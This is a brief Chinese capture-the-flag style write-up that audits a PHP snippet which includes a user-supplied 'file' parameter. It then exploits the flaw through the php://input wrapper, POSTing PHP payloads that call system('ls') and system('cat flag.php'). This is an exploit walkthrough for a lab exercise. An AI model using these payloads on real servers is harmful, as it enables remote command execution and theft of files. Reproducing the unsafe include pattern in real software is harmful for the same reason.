代码审计
<?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); //文件包含漏洞 }else{ highlight_file(__FILE__); }利用
php://input伪协议读取数据
?file=php://input
#POST数据
<?php system('ls');?>
<?php system('cat flag.php');?>
若有收获,就点个赞吧
0 人点赞
